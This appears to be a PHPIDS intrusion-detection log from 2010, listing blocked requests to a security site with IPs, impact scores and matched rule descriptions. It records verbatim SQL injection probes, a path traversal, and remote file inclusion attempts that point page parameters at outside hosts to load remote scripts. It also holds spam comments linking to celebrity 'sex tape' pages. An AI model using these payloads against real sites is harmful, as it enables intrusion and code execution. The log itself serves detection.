Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121968
Name:GET.page
Value:security/?page=security/cachecrack' aND '8'='8
Page:/i.php?page=security/?page=security/cachecrack%27%20aND%20%278%27%3D%278
IP:60.4.48.2
Impact:46
Created:2010-04-20 21:59:55
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:121965
Name:REQUEST.page
Value:security/?page=security/cachecrack'`([{^~
Page:/i.php?page=security/?page=security/cachecrack%27%60%28%5B%7B%5E%7E
IP:60.4.48.2
Impact:24
Created:2010-04-20 21:59:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:121966
Name:GET.page
Value:security/?page=security/cachecrack'`([{^~
Page:/i.php?page=security/?page=security/cachecrack%27%60%28%5B%7B%5E%7E
IP:60.4.48.2
Impact:24
Created:2010-04-20 21:59:47
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:121963
Name:REQUEST.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-20 21:50:59
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121964
Name:GET.page
Value:security/networkprinterhacking>Hacking network printers</a> by northpole<br> <a href=
Page:/i.php?page=security/networkprinterhacking%3EHacking%20network%20printers%3C/a%3E%0A%09by%20northpole%3Cbr%3E%0A%09%3Ca%20href=
IP:67.195.111.36
Impact:8
Created:2010-04-20 21:50:59
Details:
	<a href=
Impact: 4 | Tags: xss
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121961
Name:REQUEST.codeme
Value:I like your work!, <a href= http://vanessahudgenssextape.tumblr.com/ >Discount vanessa hudgens sex tape</a>, [url= http://vanessahudgenssextape.tumblr.com/ ]Discount vanessa hudgens sex tape[/url], 91041,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 21:34:26
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121962
Name:POST.codeme
Value:I like your work!, <a href= http://vanessahudgenssextape.tumblr.com/ >Discount vanessa hudgens sex tape</a>, [url= http://vanessahudgenssextape.tumblr.com/ ]Discount vanessa hudgens sex tape[/url], 91041,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 21:34:26
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121959
Name:REQUEST.codeme
Value:I bookmarked this guestbook., <a href= http://parishiltonsextapeonline.tumblr.com/ >paris hilton sex tape for you</a>, [url= http://parishiltonsextapeonline.tumblr.com/ ]paris hilton sex tape for you[/url], fqszdl,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 19:36:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121960
Name:POST.codeme
Value:I bookmarked this guestbook., <a href= http://parishiltonsextapeonline.tumblr.com/ >paris hilton sex tape for you</a>, [url= http://parishiltonsextapeonline.tumblr.com/ ]paris hilton sex tape for you[/url], fqszdl,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 19:36:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121957
Name:REQUEST.amp;mode
Value:print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:42
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121958
Name:GET.amp;mode
Value:print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:42
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121955
Name:REQUEST.amp;mode
Value:print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:30
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121956
Name:GET.amp;mode
Value:print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks&amp;mode=print//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:30
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121953
Name:REQUEST.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121954
Name:GET.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121951
Name:REQUEST.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121952
Name:GET.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:25:06
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121949
Name:REQUEST.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:23:57
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121950
Name:GET.page
Value:reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:23:57
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121945
Name:REQUEST.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:18:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121946
Name:GET.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:20
Created:2010-04-20 19:18:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121947
Name:REQUEST.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:26
Created:2010-04-20 19:18:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121948
Name:GET.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:26
Created:2010-04-20 19:18:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121943
Name:REQUEST.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:26
Created:2010-04-20 19:18:02
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121944
Name:GET.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:174.133.171.74
Impact:26
Created:2010-04-20 19:18:02
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121939
Name:REQUEST.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-20 19:16:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121940
Name:GET.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-20 19:16:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121941
Name:REQUEST.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:20
Created:2010-04-20 19:16:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121942
Name:GET.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:20
Created:2010-04-20 19:16:51
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121935
Name:REQUEST.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:20
Created:2010-04-20 19:16:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121936
Name:REQUEST.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-20 19:16:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121937
Name:GET.page
Value:reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:20
Created:2010-04-20 19:16:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121938
Name:GET.page
Value:reviews/chaosnetworks //samples/news.php?DIR=http://phamsight.com/docs/images/head??
Page:/i.php?page=reviews/chaosnetworks%20%20//samples/news.php?DIR=http://phamsight.com/docs/images/head??
IP:67.222.152.66
Impact:26
Created:2010-04-20 19:16:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121933
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://lindsaylohansextape.tumblr.com/ >Discount lindsay lohan sex tape</a>, [url= http://lindsaylohansextape.tumblr.com/ ]Discount lindsay lohan sex tape[/url], 599,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 18:56:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121934
Name:POST.codeme
Value:can you do thi for me, <a href= http://lindsaylohansextape.tumblr.com/ >Discount lindsay lohan sex tape</a>, [url= http://lindsaylohansextape.tumblr.com/ ]Discount lindsay lohan sex tape[/url], 599,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 18:56:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121931
Name:REQUEST.codeme
Value:Only, <a href= http://jessicasimpsonsextape.tumblr.com/#1 >jessica simpson sex tape</a> [url=http://jessicasimpsonsextape.tumblr.com/#1]jessica simpson sex tape[/url], %[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-20 18:17:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:121932
Name:POST.codeme
Value:Only, <a href= http://jessicasimpsonsextape.tumblr.com/#1 >jessica simpson sex tape</a> [url=http://jessicasimpsonsextape.tumblr.com/#1]jessica simpson sex tape[/url], %[,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-20 18:17:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:121929
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://rkellysextape.tumblr.com/ >Buy r kelly sex tape</a>, [url= http://rkellysextape.tumblr.com/ ]Buy r kelly sex tape[/url], jido,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 17:38:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121930
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://rkellysextape.tumblr.com/ >Buy r kelly sex tape</a>, [url= http://rkellysextape.tumblr.com/ ]Buy r kelly sex tape[/url], jido,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 17:38:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121927
Name:REQUEST.codeme
Value:Best Wishes, <a href= http://rayjsextapeandkim.tumblr.com/#1 >ray j sex tape</a> [url=http://rayjsextapeandkim.tumblr.com/#1]ray j sex tape[/url], 007,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 16:59:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121928
Name:POST.codeme
Value:Best Wishes, <a href= http://rayjsextapeandkim.tumblr.com/#1 >ray j sex tape</a> [url=http://rayjsextapeandkim.tumblr.com/#1]ray j sex tape[/url], 007,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 16:59:03
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121925
Name:REQUEST.codeme
Value:Perfect work, <a href= http://misscaliforniasextape.tumblr.com/#1 >miss california sex tape information</a> [url=http://misscaliforniasextape.tumblr.com/#1]miss california sex tape information[/url], 092,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 15:40:24
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121926
Name:POST.codeme
Value:Perfect work, <a href= http://misscaliforniasextape.tumblr.com/#1 >miss california sex tape information</a> [url=http://misscaliforniasextape.tumblr.com/#1]miss california sex tape information[/url], 092,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 15:40:24
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121921
Name:REQUEST.page
Value:security/ettercapfilter//?content=http://hd-win.com/articles/ssh/sc1?
Page:/i.php?page=security/ettercapfilter//?content=http://hd-win.com/articles/ssh/sc1?
IP:208.43.48.82
Impact:42
Created:2010-04-20 15:33:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121922
Name:REQUEST.page
Value:security//?content=http://hd-win.com/articles/ssh/sc1?
Page:/i.php?page=security//?content=http://hd-win.com/articles/ssh/sc1?
IP:208.43.48.82
Impact:42
Created:2010-04-20 15:33:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121923
Name:GET.page
Value:security//?content=http://hd-win.com/articles/ssh/sc1?
Page:/i.php?page=security//?content=http://hd-win.com/articles/ssh/sc1?
IP:208.43.48.82
Impact:42
Created:2010-04-20 15:33:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121924
Name:GET.page
Value:security/ettercapfilter//?content=http://hd-win.com/articles/ssh/sc1?
Page:/i.php?page=security/ettercapfilter//?content=http://hd-win.com/articles/ssh/sc1?
IP:208.43.48.82
Impact:42
Created:2010-04-20 15:33:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121919
Name:REQUEST.codeme
Value:Is it so important?, http://britneyspearssextape.tumblr.com/ britney spears sex tape, 6419,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-20 14:21:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:121920
Name:POST.codeme
Value:Is it so important?, http://britneyspearssextape.tumblr.com/ britney spears sex tape, 6419,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-20 14:21:37
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:121917
Name:REQUEST.codeme
Value:Best, <a href= http://celebritysextapes.tumblr.com/#1 >celebrity sex tapes price</a> [url=http://celebritysextapes.tumblr.com/#1]celebrity sex tapes price[/url], >:O,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 13:41:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121918
Name:POST.codeme
Value:Best, <a href= http://celebritysextapes.tumblr.com/#1 >celebrity sex tapes price</a> [url=http://celebritysextapes.tumblr.com/#1]celebrity sex tapes price[/url], >:O,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 13:41:43
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121915
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:67.195.111.36
Impact:42
Created:2010-04-20 12:47:37
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121916
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:67.195.111.36
Impact:42
Created:2010-04-20 12:47:37
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:121913
Name:REQUEST.codeme
Value:Great, <a href= http://kimkardashiansextapenow.tumblr.com/ >kim kardashian sex tape free</a>, [url= http://kimkardashiansextapenow.tumblr.com/ ]kim kardashian sex tape free[/url], xenhx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 12:23:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121914
Name:POST.codeme
Value:Great, <a href= http://kimkardashiansextapenow.tumblr.com/ >kim kardashian sex tape free</a>, [url= http://kimkardashiansextapenow.tumblr.com/ ]kim kardashian sex tape free[/url], xenhx,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 12:23:15
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121911
Name:REQUEST.codeme
Value:--
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:201.81.227.98
Impact:6
Created:2010-04-20 11:01:45
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121912
Name:POST.codeme
Value:--
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:201.81.227.98
Impact:6
Created:2010-04-20 11:01:45
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121909
Name:REQUEST.page
Value:../i.php
Page:/i.php?page=../i.php
IP:66.249.67.178
Impact:10
Created:2010-04-20 10:30:33
Details:
